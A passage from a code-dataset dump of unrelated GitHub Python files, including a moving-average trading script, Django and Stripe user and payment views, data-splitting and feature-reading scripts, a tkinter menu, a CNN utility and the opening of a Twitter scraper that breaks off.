tickerdata.dropna(inplace=True)\n\n # create a flag for when to create buy or sell transaction\n tickerdata['return'] = np.log(tickerdata['close']).diff()\n tickerdata['system_return'] = tickerdata['signal'] * tickerdata['return']\n tickerdata['transactionFlag'] = tickerdata.signal.diff()\n \n print(tickerdata['return'])\n # maPlot(tickerdata)\n \n return tickerdata.loc[tickerdata.index[-1],'transactionFlag']\n\n\n###################################################\n# Functions maPlot and maPerformance #\n# are strictly for testing and research purposes #\n###################################################\n\n# def maPlot(gld):\n# plt.rcParams['figure.figsize'] = 12, 6\n# plt.grid(True, alpha = .3)\n# plt.plot(gld.iloc[-208:]['close'], label = 'GLD')\n# plt.plot(gld.iloc[-208:]['short-term'], label = 'short-term')\n# plt.plot(gld.iloc[-208:]['long-term'], label = 'long-term')\n# plt.plot(gld[-208:].loc[gld.transactionFlag == 2].index, gld[-208:]['short-term'][gld.transactionFlag == 2], '^',\n# color = 'g', markersize = 12)\n# plt.plot(gld[-208:].loc[gld.transactionFlag == -2].index, gld[-208:]['long-term'][gld.transactionFlag == -2], 'v',\n# color = 'r', markersize = 12)\n# plt.legend(loc=2)\n# plt.show()\n\n# def maPerformance(gld):\n# plt.plot(np.exp(gld['return']).cumprod(), label='Buy/Hold')\n# plt.plot(np.exp(gld['system_return']).cumprod(), label='System')\n# plt.legend(loc=2)\n# plt.grid(True, alpha=.3)\n# plt.show()\n \n\n\n","repo_name":"tgclark20/Alpine","sub_path":"alpine/movingAverage.py","file_name":"movingAverage.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5399674763","text":"from django.shortcuts import render_to_response\r\nfrom mango_demo.api.resources import UserResource\r\n\r\ndef 
user_detail(request, username):\r\n ur = UserResource()\r\n user = ur.obj_get(username=username)\r\n \r\n ur_bundle = ur.build_bundle(obj=user, request=request)\r\n return render_to_response('mango_demo/user_detail.html', {\r\n # Other things here.\r\n \"user_json\": ur.serialize(None, ur.full_dehydrate(ur_bundle), 'application/json'),\r\n })\r\n\r\n","repo_name":"matthewting/amazing","sub_path":"mango_demo/mango_demo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"7445355100","text":"import os\nimport sys\nsys.path.insert(0, '../../../../scripts/')\nimport preprocessing as pp\nimport pandas as pd\nimport unidecode as ud\n\nflag = 0\n\nout = []\nresult = []\nmain_df = pd.DataFrame(columns = ['id', 'sent_1', 'sent_2', 'label', 'stance'])\nout_main_df = pd.DataFrame(columns = ['content']) \nfor filename in os.listdir(os.getcwd()):\n #print filename\n if \"onew_result_1\" in filename:\n #print filename\n df_1 = pd.read_csv(filename, names= None)\n main_df = main_df.append(df_1)\n if \"onew_result_2\" in filename:\n df_2 = pd.read_csv(filename, names=None)\n main_df = main_df.append(df_2)\n if \"onew_result_3\" in filename:\n df_3 = pd.read_csv(filename, names=None)\n main_df = main_df.append(df_3)\n if \"onew_result_4\" in filename:\n df_4 = pd.read_csv(filename, names=None)\n main_df = main_df.append(df_4)\n elif \"onew_out\" in filename:\n out_df = pd.read_csv(filename, names = None)\n out_main_df = out_main_df.append(out_df)\n\n\nset_df = pd.DataFrame(columns = ['id', 'sent_1', 'sent_2', 'label', 'stance'])\nset_df = set_df.append(df_1)\nset_df = set_df.append(df_2)\nset_df = set_df.append(df_3)\n\ntr_set1_df_4 = df_4.iloc[:-2368]\ntst_set1_df_4 = df_4.iloc[-2368:]\n\ntr_set2_df_4 = df_4.iloc[ :-4732].append(df_4.iloc[-2368:])\ntst_set2_df_4 = df_4.iloc[-4732:-2368]\n\ntr_set3_df_4 = df_4.iloc[ :-7096].append(df_4.iloc[-4732:])\ntst_set3_df_4 = df_4.iloc[-7096:-4732]\n\ntr_set4_df_4 = df_4.iloc[ :-9460].append(df_4.iloc[-7096:])\ntst_set4_df_4 = df_4.iloc[-9460:-7096]\n\ntr_set5_df_4 = df_4.iloc[:2368].append(df_4.iloc[4732:])\ntst_set5_df_4 = df_4.iloc[2368:4732]\n\n\n#print main_df\n#print len(main_df)\n#print len(out_main_df)\n\n'''\nmain_df = main_df.sample(frac=1).reset_index(drop=True)\ndf_class0 = main_df.loc[main_df['label'] == 0]\ndf_class0 = df_class0.sample(frac=1).reset_index(drop=True)\ndf_class1 = main_df.loc[main_df['label'] == 1]\ndf_class1 = df_class1.sample(frac=1).reset_index(drop=True)\n\nsize = len(df_class1)\ndf_class0 = df_class0.iloc[:size+1000]\ntr_df_123 = df_class1.append(df_class0)\ntr_df_123 = tr_df_123.sample(frac=1).reset_index(drop=True)\n\nprint len(tr_df_123)\ntr_df_123.to_csv('tr-combined-412.csv', index=False)\n\n\nprint len(main_df)\nprint len(out_main_df)\n\nmain_df = main_df.sample(frac=1).reset_index(drop=True)\nmain_df.to_csv('new-combined-result.csv', index=False)\nout_main_df.to_csv('new-combined-out.csv', index=False)\n\n'''\nprint(len(set_df))\ntr_set1_df_4 = tr_set1_df_4.append(set_df)\ntr_set1_df_4 = tr_set1_df_4.sample(frac=1).reset_index(drop=True)\ndf_class0 = tr_set1_df_4.loc[tr_set1_df_4['label'] == 0]\ndf_class0 = df_class0.sample(frac=1).reset_index(drop=True)\ndf_class1 = tr_set1_df_4.loc[tr_set1_df_4['label'] == 1]\ndf_class1 = df_class1.sample(frac=1).reset_index(drop=True)\n\nsize = len(df_class1)\ndf_class0 = df_class0.iloc[:size+1000]\ntr_df_4 = df_class1.append(df_class0)\ntr_df_4 = 
tr_df_4.sample(frac=1).reset_index(drop=True)\n\nprint(len(tr_df_4))\nprint(len(tst_set1_df_4))\n\ntr_df_4.to_csv('tr_set1_df_4.csv', index=False)\ntst_set1_df_4.to_csv('tst_set1_df_4.csv', index=False)\n\n\n'''\ntrain_df = main_df.iloc[:-1000]\nremain_df = main_df.iloc[-1000:]\nremain_df = remain_df.sample(frac=1).reset_index(drop=True)\n\ndev_df = remain_df.iloc[:-500]\ntest_df = remain_df.iloc[-500:]\n\n\n#train_df.to_csv('train.csv', index=False)\n#dev_df.to_csv('dev.csv', index=False)\n#test_df.to_csv('test.csv', index=False)\n\ndf_class0 = main_df.loc[main_df['labels'] == 0]\ndf_class0 = df_class0.sample(frac=1).reset_index(drop=True)\ndf_class1 = main_df.loc[main_df['labels'] == 1]\ndf_class1 = df_class1.sample(frac=1).reset_index(drop=True)\n\ntrain_df_class0 = df_class0.iloc[:-500]\n\n#making class 0 size almost equal to class 1 size in training data\ntrain_df_class0 = train_df_class0.iloc[:4000]\n\nremain_df_class0 = df_class0.iloc[-500:]\ndev_df_class0 = remain_df_class0[:-250]\ntest_df_class0 = remain_df_class0[-250:]\n\ntrain_df_class1 = df_class1.iloc[:-500]\nremain_df_class1 = df_class1.iloc[-500:]\ndev_df_class1 = remain_df_class1[:-250]\ntest_df_class1 = remain_df_class1[-250:]\n\ntrain_df = train_df_class0.append(train_df_class1)\ntrain_df.sample(frac=1).reset_index(drop=True)\ndev_df = dev_df_class0.append(dev_df_class1)\ndev_df.sample(frac=1).reset_index(drop=True)\ntest_df = test_df_class0.append(test_df_class1)\ntest_df.sample(frac=1).reset_index(drop=True)\n\nprint len(train_df)\nprint len(dev_df)\nprint len(test_df)\n\ntrain_df.to_csv('train_balanced.csv', index=False)\ndev_df.to_csv('dev_balanced.csv', index=False)\ntest_df.to_csv('test_balanced.csv', index=False)\n'''\n\n'''\ntext = out_main_df['content'].tolist()\ntext = \" \".join(text)\ntext = text.decode('ascii', 'ignore')\nans = pp.preprocess_pipeline(text, lang='english', stemmer_type ='WordNetLemmatizer', return_as_list=True, do_remove_stopwords=True)\nlist_df = pd.DataFrame(columns = ['word'])\nlist_df['word'] = ans\n\n'''\n#list_df.to_csv('combined-word-list.csv', index=False)\n\n#print len(ans)\n#print ans \n","repo_name":"ayush-jain/paraphrase-stance-cf","sub_path":"scripts/combine_output.py","file_name":"combine_output.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7907610270","text":"from django.shortcuts import render\nfrom django.conf import settings\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom base.serializer import *\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom django.contrib.auth.models import User\nfrom base.models import UserStripe, UserPaymentMethodsStripe, ShippingAdress\nfrom django.contrib.auth.hashers import make_password\nfrom rest_framework import status\nimport stripe\nimport json\n\n\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n def validate(self, attrs):\n data = super().validate(attrs)\n\n serializer = UserSerializerWithtoken(self.user).data\n print(serializer)\n\n for k, v in serializer.items():\n data[k] = v\n\n return data\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef 
getUserProfile(request):\n user = request.user\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n\n@api_view(['GET'])\n@permission_classes([IsAdminUser])\ndef getUsers(request):\n users = User.objects.all()\n serializer = UserSerializer(users, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef registerUser(request):\n stripe.api_key = settings.STRIPE_SECRET_KEY\n data= request.data\n\n try:\n user = User.objects.create(\n first_name = data['name'],\n username = data['email'],\n email = data['email'],\n password = make_password(data['password']),\n )\n print(data)\n customer=stripe.Customer.create(\n name=data['name'],\n email =data['email'],\n )\n user_stripe_id = UserStripe.objects.create(\n user=user,\n stripe_customer_id= customer.id\n )\n\n serializer = UserSerializerWithtoken(user, many= False)\n return Response(serializer.data)\n\n except:\n message = {'detail': 'User already exists'}\n return Response(message, status= status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET'])\n@permission_classes([IsAdminUser])\ndef getUserById(request, pk):\n user = User.objects.get(id=pk)\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\n@permission_classes([IsAdminUser])\ndef deleteUser(request, pk):\n stripe.api_key = settings.STRIPE_SECRET_KEY\n userForDeletion = User.objects.get(id=pk)\n usersStripe = UserStripe.objects.get(user= userForDeletion)\n stripe_customer=stripe.Customer.delete(usersStripe.stripe_customer_id)\n usersStripe.delete()\n userForDeletion.delete()\n return Response('user deleted')\n\n@api_view(['PUT'])\n@permission_classes([IsAdminUser])\ndef updateUser(request, pk):\n stripe.api_key = settings.STRIPE_SECRET_KEY\n user = User.objects.get(id=pk)\n\n data = request.data\n\n user.first_name = data['name']\n user.last_name = data['email']\n user.email = data['email']\n user.is_staff = data['isAdmin']\n\n user_stripe_id = UserStripe.objects.get(user=user)\n customer=stripe.Customer.modify(\n user_stripe_id.stripe_customer_id,\n name=data['name'],\n email =data['email'],\n )\n\n user.save()\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef addCouponToUser(request, pk):\n error_message = 'coupon does not exists'\n try:\n data = request.data\n coupon = data['coupon']\n coupon = Coupon.objects.get(code = coupon.upper())\n user = User.objects.get(id=pk)\n if request.user == user:\n user.coupon_set.add(coupon)\n\n user.save()\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n else:\n raise Exception('User is not the current request user')\n except Exception as e:\n error_message = e\n message = {'detail': f'{error_message}'}\n return Response(message, status= status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef addPaymentMethod(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n stripe.api_key = settings.STRIPE_SECRET_KEY\n stripe_payment_id=stripe.PaymentMethod.create(\n type=\"card\",\n card={\n \"number\": data['card-number'],\n \"exp_month\": data['card-exp-month'],\n \"exp_year\": data['card-exp-year'],\n \"cvc\": data['card-cvc'],\n },\n )\n stripe_customer = user.userstripe\n print(stripe_customer)\n\n stripe.PaymentMethod.attach(\n stripe_payment_id.id,\n customer=stripe_customer.stripe_customer_id,\n )\n\n payment_obj = 
UserPaymentMethodsStripe.objects.filter(user=user)\n\n for pay_obj in payment_obj:\n pay_obj.default = False\n pay_obj.save()\n\n paymentuser_method_stripe = UserPaymentMethodsStripe.objects.create(\n user= user,\n stripe_payment_id= stripe_payment_id.id,\n default= True,\n )\n return Response('payment added')\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef changeDefaultPaymentMethod(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n payment_methods =UserPaymentMethodsStripe.objects.filter(user=user)\n\n for pay_obj in payment_methods:\n if pay_obj.stripe_payment_id != data['id']:\n pay_obj.default = False\n pay_obj.save()\n else:\n pay_obj.default = True\n pay_obj.save()\n\n return Response(' default payment changed')\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef retrievePaymentMethods(request, pk):\n user = User.objects.get(id=pk)\n payment_methods =UserPaymentMethodsStripe.objects.filter(user=user)\n print(payment_methods)\n try:\n stripe.api_key = settings.STRIPE_SECRET_KEY\n user = User.objects.get(id=pk)\n stripe_customer = user.userstripe\n users_payment_methods= stripe.PaymentMethod.list(\n customer=stripe_customer.stripe_customer_id,\n type=\"card\",\n )\n\n json_obj = {}\n json_obj['data']= []\n print(json_obj)\n for method in users_payment_methods.data:\n for pay_method in payment_methods:\n if method.id == pay_method.stripe_payment_id:\n obj= method\n if pay_method.default == True:\n obj['default'] = True\n else:\n obj['default'] = False\n obj['_id'] = pay_method._id\n json_obj['data'].append(obj)\n\n # print(users_payment_methods)\n return Response(json_obj)\n except:\n message = {'detail': 'User does not have payment methods'}\n return Response(message, status= status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef addShippingaddress(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n shippings_adds =ShippingAdress.objects.filter(user= user)\n\n for shipping_add in shippings_adds:\n shipping_add.default = False\n shipping_add.save()\n\n shipping_address =ShippingAdress.objects.create(\n user= user,\n address = data['address'],\n postalCode = data['postalCode'],\n country = data['country'],\n city = data['city'],\n )\n\n return Response('Shippingaddress added')\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef retrieveShippingaddress(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n shippings_adds =ShippingAdress.objects.filter(user= user)\n serializer = ShippingAdressSerializer(shippings_adds, many= True)\n\n return Response(serializer.data)\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef changeDefaultShippingaddress(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n shippings =ShippingAdress.objects.filter(user=user)\n\n for shippings_adds in shippings:\n if int(shippings_adds._id) != int(data['_id']):\n shippings_adds.default = False\n shippings_adds.save()\n else:\n shippings_adds.default = True\n shippings_adds.save()\n\n return Response(' default shippings_adds changed')\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef deleteShippingaddress(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n shipping =ShippingAdress.objects.get(_id=data['_id'])\n\n shippings =ShippingAdress.objects.filter(user=user)\n\n if len(shippings) >= 2 and shipping.default == True:\n for shipping_add in shippings:\n if shipping_add._id != 
shipping._id:\n shipping_add.default = True\n shipping_add.save()\n break;\n\n shipping.delete()\n\n return Response('shipping deleted')\n","repo_name":"oscara1796/ecommerce_platzi_olympia","sub_path":"base/views/user_views.py","file_name":"user_views.py","file_ext":"py","file_size_in_byte":9203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24209193188","text":"#Brandon Norwood\r\n#09/28/2021\r\n#Assign4-4\r\n\r\nimport sys\r\nimport math\r\n\r\ndef calc(n1, n2, n3):\r\n ex1= n1 \r\n ex2= n2 * n2\r\n ex3= n3 * n3 * n3\r\n \r\n summation = ex1 + ex2 + ex3\r\n result = summation ** (1/2) # math.sqrt(summation)\r\n \r\n result = round(result, 2)\r\n return result\r\n\r\nnum1 = int(sys.argv[1])\r\nnum2 = int(sys.argv[2])\r\nnum3 = int(sys.argv[3])\r\n\r\nresult = calc(num1, num2, num3)\r\nprint(result)\r\n\r\n\r\n","repo_name":"Brandon-Norwood/Python_Scripts","sub_path":"DataProgramming/M4/assign4-4.py","file_name":"assign4-4.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15413562906","text":"import struct\nimport numpy as np\nimport os\n# input: 特征文件夹的路径\n# return: datas, 各类别的音频特征组成的列表\n# 其中datas['1'] = a list :属于类别1的特征列表, 列表中每个元素都是一个特征序列(T*n_dim的numpy矩阵)\ndef get_mfc_data(path):\n files = os.listdir(path)\n datas = dict()\n for file_name in files: # 读取每个mfc文件到矩阵data中\n data = list()\n with open(path+file_name, 'rb') as f:\n nframes = struct.unpack('>i',f.read(4))[0] # 帧数 \n _ = struct.unpack('>i',f.read(4))[0] # 帧移,100ns为单位,100000指10ms,\n nbytes = struct.unpack('>h',f.read(2))[0] # 每帧特征值的字节长度\n ndim = nbytes / 4 # 每帧的特征的维度(一维为一个int)\n _ = struct.unpack('>h',f.read(2))[0] # [没用] 用户序号\n while True:\n data_byte = f.read(4)\n if len(data_byte) < 4: \n break\n data.append(struct.unpack('>f', data_byte)[0]) \n data = np.array(data)\n data.shape = nframes, int(ndim)\n category = file_name[0]\n if category in datas:\n datas[category].append(data)\n else:\n datas[category] = list()\n datas[category].append(data)\n return datas\n ","repo_name":"guozix/HMM_for_command_recognization","sub_path":"get_mfc_data.py","file_name":"get_mfc_data.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"4203415621","text":"s=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ_.ABCDEFGHIJKLMNOPQRSTUVWXYZ_.\"\n\n# in1=input().split()\n# n=int(in1[0])\n# l=in1[1]\ndef getAns(n, l):\n l=l[::-1]\n new=[s[s.find(x)+n] for x in l]\n print(\"\".join(new))\ncon=True\nwhile con:\n x=input().split()\n if x==[\"0\"]:\n con=False\n elif len(x)==2:\n getAns(int(x[0]), x[1])","repo_name":"Adamkadaban/Competition-Programs","sub_path":"Kattis/reverserot.py","file_name":"reverserot.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"70420348808","text":"# Import packages\nimport tkinter as tk\nimport makeSale\nimport manageProducts\n\n\ndef main():\n\n # Window Geometry and Basic Settings\n windowHeight = 544\n windowWidth = 933\n window = tk.Tk()\n window.title(\"Sistema de Comandas - Chapéu de Sol\")\n window.geometry(str(windowWidth)+\"x\"+str(windowHeight))\n\n # Background Image\n bg = tk.PhotoImage(file=\"img/mainMenuBG.png\")\n label1 = tk.Label(window, image=bg)\n label1.place(x=-2, y=-1)\n\n # Buttons\n bt1 = tk.PhotoImage(file=\"img/buttons/realizarVendasBT.png\")\n button1 = 
tk.Button(window, image = bt1,command=lambda : navigateNewWindow(window,makeSale))\n #button1.pack(side=tk.LEFT,padx=10)\n button1.place(relx=0.15, rely=0.5, anchor=tk.CENTER)\n\n bt2 = tk.PhotoImage(file=\"img/buttons/gerenciarProdutosBT.png\")\n button2 = tk.Button(window, text = 'Click Me !', image = bt2,command=lambda : navigateNewWindow(window,manageProducts))\n #button2.pack(side=tk.LEFT,padx=10)\n button2.place(relx=0.38, rely=0.5, anchor=tk.CENTER)\n\n bt3 = tk.PhotoImage(file=\"img/buttons/elogiosEReclamacoesBT.png\")\n button3 = tk.Button(window, text = 'Click Me !', image = bt3)\n #button3.pack(side=tk.LEFT,padx=10)\n button3.place(relx=0.61, rely=0.5, anchor=tk.CENTER)\n\n bt4 = tk.PhotoImage(file=\"img/buttons/fecharCaixaBT.png\")\n button4 = tk.Button(window, text = 'Click Me !', image = bt4)\n #button4.pack(side=tk.LEFT,padx=10)\n button4.place(relx=0.84, rely=0.5, anchor=tk.CENTER)\n\n window.mainloop()\n\ndef navigateNewWindow(currentWindow,newWindowFile):\n newWindowFile.open(currentWindow)\n\nmain()\n","repo_name":"GabrielTomonari/sistema-comandas","sub_path":"mainMenu.py","file_name":"mainMenu.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"72449587848","text":"import pytest\nimport sys\nsys.path.extend([\".\", \"..\", \"../..\", \"../../..\"])\nfrom model.environment_frozenlake import FrozenLake\nfrom model.agent_reinforce import AgentREINFORCE\nfrom controller.controller_reinforce import ControllerREINFORCE\nfrom view.animation_frozenlake import AnimationFrozenLake\nfrom view.gui import GUI\nfrom tkinter import Tk\n\n\n@pytest.fixture(scope=\"module\")\ndef controller():\n pytest.env = FrozenLake(False)\n pytest.agent = AgentREINFORCE(pytest.env)\n root = Tk()\n animation = AnimationFrozenLake(root, pytest.env.GRID_MAP, update_animation=False)\n pytest.gui = GUI(root, animation)\n pytest.controller = ControllerREINFORCE(pytest.env, pytest.agent, pytest.gui)\n return pytest.controller\n\n\ndef test_stop_and_reset(controller):\n pytest.gui.animation.update_animation = False\n pytest.controller.stop_and_reset()\n env_current_state = pytest.env.current_state\n num_of_weights = len(pytest.agent.theta)\n assert (env_current_state, num_of_weights) == ((0, 0), 2)\n\n\ndef test_episode(controller):\n pytest.gui.animation.update_animation = False\n pytest.controller.run_episode()\n","repo_name":"avcordaro/animated-reinforcement-learning","sub_path":"tests/integration/controllers/test_controller_reinforce_with_agent_&_env.py","file_name":"test_controller_reinforce_with_agent_&_env.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26687788596","text":"# src ultis to create CNN layer based on user define parameters and input data size.\n\n# import API/libraries. 
\nimport numpy as np\nimport pandas as pd \nimport tensorflow as tf\nimport logging\nimport sys\n\n\n# system setup\nsys.path.append('/Users/ahum/Documents/[Project] PIPE_DEV/src')\nsys.path.append('/Users/ahum/Documents/[Project] PIPE_DEV/data/')\nlogging.basicConfig(filename='/Users/ahum/Documents/[Project] PIPE_DEV/src/scr_ultis.log', \n encoding='utf-8',filemode='a',\n format='<%(asctime)s> ---- %(message)s', level=logging.INFO)\n# print version\nlogging.info('---- API/Package Versions -----')\nlogging.info('| numpy | Version:{}'.format(np.__version__))\nlogging.info('| pandas | Version:{}'.format(pd.__version__))\nlogging.info('| tensorflow | Version:{}'.format(tf.__version__))\nlogging.info('| logging | Version:{}'.format(logging.__version__))\nlogging.info('-------------------------------')\n\n# side note: start define the class\n# 1) Data preparing class - Need to create another ultis file and import into here.\n# 2) DL define class\n\nclass _CNN_Ultis():\n def __init__(self,in_ary='',pad_mode=False,pad_sz=[1,1],filter_sz=[3,3],stride=1):\n '''\n Initialisation for creating CNN baseline NN.\\n\n\n Input:\\n\n ------\\n\n in_ary: (dtype: array): input array that store the input data. Default is empty\\n\n pad_mode: (dtype: boolean): input array that store the input data. Default is false, which indicate no padding.\\n\n pad_sz: (dtype: array): input array indicates the padding size to be added to the input data. Default is [1,1] meaning an addition 1 row and 1 column of pixel is added to the data. pad_sz is ignored if pad_mode is False\\n\n filter_sz (dtype: array): input array is the filter size. Default size is [3,3], i.e., 3x3. \n stride (dtype: integer): the integer indicates the sliding step of the filter across the input data. Default is 1. Do not that the stride must not be more that the filter size\\n \n '''\n try:\n self.in_data=in_ary\n self.pad_mode=pad_mode\n self.padSZ=pad_sz\n self.filterSZ=filter_sz\n self.stride=stride\n logging.info('Ultis initialised.')\n logging.info('------------------')\n if pad_mode==False:\n logging.info('|Padding: {}|filter_sz: {}|stride: {}|'.format(str(pad_mode),str(filter_sz),str(stride)))\n else:\n logging.info('|Padding_sze: {}|filter_sz: {}|stride: {}|'.format(str(pad_sz),str(filter_sz),str(stride))) \n \n except Exception as e:\n logging.error(\"Exception occurred\", exc_info=True)\n \n def _Cal_NN_SZ(self):\n # get the size of the image\n sh=self.in_data.shape\n self.im_W=sh[1]\n self.im_ht=sh[2]\n self.im_ch=sh[3]\n\n def _define_NN(self):\n #in_sh=(4,28,28,3)\n #x=tf.random.normal(in_sh)\n #in_shape=[512,512]\n logging.info('-------Defining the CNN structure-----.')\n opti_filterSZ=self.in_data.shape[1]*self.in_data.shape[2]*self.in_data.shape[3]\n #init=tf.keras.initializers.GlorotNormal(seed=None) # initialise the weight with uniform distibution\n \n layer_in=tf.keras.layers.Input(shape=[self.in_data.shape[1],self.in_data.shape[1],self.in_data.shape[-1]],name='CNN_in')\n layer_l1=tf.keras.layers.Conv2D(filters=opti_filterSZ,kernel_size=(self.filterSZ[0],self.filterSZ[1]),padding='same',\n activation='relu',strides=self.stride,name='CNN_L1',input_shape=self.in_data.shape[1:])(layer_in)\n layer_l1_maxpool=tf.keras.layers.MaxPooling2D(pool_size=(2,2))(layer_l1) #maxpooling with pool_size of 2,2 will reduce the conv size by half. 
\n \n layer_l2=tf.keras.layers.Conv2D(filters=opti_filterSZ,kernel_size=(self.filterSZ[0],self.filterSZ[1]),padding='same',\n activation='relu',strides=self.stride,name='CNN_L2',input_shape=self.in_data.shape[1:])(layer_l1_maxpool)\n layer_l2_maxpool=tf.keras.layers.MaxPooling2D(pool_size=(2,2))(layer_l2) #maxpooling with pool_size of 2,2 will reduce the conv size by half.\n\n featureMAP=tf.keras.layers.Conv2D(filters=opti_filterSZ,kernel_size=(self.filterSZ[0],self.filterSZ[1]),padding='same',\n activation='relu',strides=self.stride,name='featureMAP',input_shape=self.in_data.shape[1:])(layer_l2_maxpool)\n layer_Fm_maxpool=tf.keras.layers.MaxPooling2D(pool_size=(2,2))(featureMAP) #maxpooling with pool_size of 2,2 will reduce the conv size by half. \n\n layer_Flat=tf.keras.layers.Flatten()(layer_Fm_maxpool)\n layer_D1=tf.keras.layers.Dense(2,activation='sigmoid')(layer_Flat)\n output=tf.keras.layers.Dropout(0.5)(layer_D1)\n # Can include a dropout layer here\n\n # fit NN to the model\n self.CNN_model=tf.keras.Model(layer_in,output,name='CNN_out')\n self.CNN_model.summary(print_fn=logging.info)\n #logging.info(self.CNN_model.summary())\n pass\n\nif __name__=='__main__':\n # for testing purpose\n from tensorflow.keras import datasets\n (train_images, train_labels), (test_images, test_labels) = datasets.cifar10.load_data()\n a=_CNN_Ultis(in_ary=train_images)\n a._Cal_NN_SZ()\n a._define_NN()\n pass\n\n\n","repo_name":"allenhjw/castor","sub_path":"src/DL_CNN_ulits.py","file_name":"DL_CNN_ulits.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29418752012","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 6 18:08:32 2021\n\n@author: Usuario\n\"\"\"\n\nwhile True:\n x=input (\"Ingrese el nummero que contaré: \")\n if x== 'q' or x == 'quit':\n break\n x=int (x)\n y=1\n while True:\n print (y)\n y=y+1\n if y>x:\n break","repo_name":"andreso21/ProgramasAndresQuishpe","sub_path":"Ejercicio6_While_Anidado.py","file_name":"Ejercicio6_While_Anidado.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16303385225","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Construct the file path\nfile_path = \"C://Users/Evan Anderson/Desktop/Hospital_General_Information.csv\"\ndata = pd.read_csv(file_path)\n\n# Sort the data by 'Hospital_Ownership' column\nsorted_data = data.sort_values(by='Hospital_Ownership')\n\n# Calculate average rating per hospital ownership type\ndata['Hospital_overall_rating'] = pd.to_numeric(data['Hospital_overall_rating'], errors='coerce')\navg_rating = data.groupby('Hospital_Ownership')['Hospital_overall_rating'].mean().sort_values()\n\n# Plotting the bar chart with average ratings\nplt.figure(figsize=(10, 6))\n\nfor index, (ownership, rating) in enumerate(avg_rating.items()):\n plt.bar(ownership, rating)\n plt.text(index, rating + 0.05, f'{rating:.2f}', ha='center', va='bottom', fontsize=8)\n\n# Set labels and title\nplt.title('Average Rating per Hospital Ownership Type')\nplt.xlabel('Ownership Type')\nplt.ylabel('Average Rating')\n\nplt.xticks(rotation=45, 
ha='right')\nplt.tight_layout()\nplt.show()\n","repo_name":"evan1417/IUSM_EM","sub_path":"boeing_hospital/hosp_ownership_rating.py","file_name":"hosp_ownership_rating.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37637950073","text":"from typing import List\n\nfrom app.config.settings import settings\n\nMODELS_MODULES: List[str] = [\"app.db.models\"] # noqa: WPS407\n\nTORTOISE_CONFIG = {\n \"connections\": {\n \"default\": settings.get_asyncpg_conn_string,\n },\n \"apps\": {\n \"models\": {\n \"models\": MODELS_MODULES,\n \"default_connection\": \"default\",\n },\n },\n}\n","repo_name":"aryantps/auth","sub_path":"app/db/tortoise_config.py","file_name":"tortoise_config.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33921621022","text":"from bs4 import BeautifulSoup\nimport requests\nimport twint\nimport nest_asyncio\nnest_asyncio.apply()\nimport pandas as pd\n\n\n\ndef format_country_name(country:str):\n '''\n feed with a country name and return formated country name \n eg. United State -> united-state\n '''\n return country.replace(\" 